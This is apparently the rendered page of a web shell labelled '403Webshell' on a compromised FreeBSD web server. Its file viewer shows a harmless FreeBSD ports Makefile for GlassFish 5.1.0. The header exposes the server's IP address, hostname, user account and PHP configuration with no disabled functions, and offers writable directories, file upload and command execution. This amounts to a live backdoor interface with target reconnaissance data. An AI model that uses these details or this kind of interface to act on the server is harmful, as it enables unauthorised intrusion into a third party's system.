403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/www/glassfish/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/www/glassfish/Makefile
PORTNAME=	glassfish
PORTVERSION=	5.1.0
PORTREVISION=	1
CATEGORIES=	www java
MASTER_SITES=	ECLIPSE/glassfish
PKGNAMEPREFIX=	eclipse-

MAINTAINER=	jmd@FreeBSD.org
COMMENT=	Eclipse Jakarta EE Platform
WWW=		https://projects.eclipse.org/projects/ee4j.glassfish

LICENSE=	EPL

USES=		zip
USE_JAVA=	yes

NO_BUILD=	yes

CONFLICTS_INSTALL=	glassfish4

WRKSRC=		${WRKDIR}/glassfish5
DATADIR=	${PREFIX}/${PORTNAME}-${PORTVERSION}

# Since we USE_JAVA, we propagate the received JAVA_HOME variable to the
# template files, since it is used by the rc script.
SUB_LIST=	GLASSFISHVERSION=${PORTVERSION} \
		JAVA_HOME=${JAVA_HOME}

USE_RC_SUBR=	glassfish
GLASSFISH_BIN_FILES=	appclient appclient.js asadmin capture-schema capture-schema.1m jspc package-appclient schemagen startserv stopserv wscompile wsdeploy wsgen wsimport xjc

.include <bsd.port.pre.mk>

do-install:
	@${FIND} ${WRKSRC} -name '*.bat' -delete
	@${FIND} ${WRKSRC} -name '*.exe' -delete
	@(cd ${WRKSRC} && ${COPYTREE_SHARE} \* ${STAGEDIR}${DATADIR})
	@${CHMOD} ${BINMODE} ${STAGEDIR}${DATADIR}/bin/*
	@${CHMOD} ${BINMODE} ${STAGEDIR}${DATADIR}/mq/bin/*
.for x in ${GLASSFISH_BIN_FILES}
	@${CHMOD} ${BINMODE} ${STAGEDIR}${DATADIR}/glassfish/bin/${x}
.endfor

.include <bsd.port.post.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit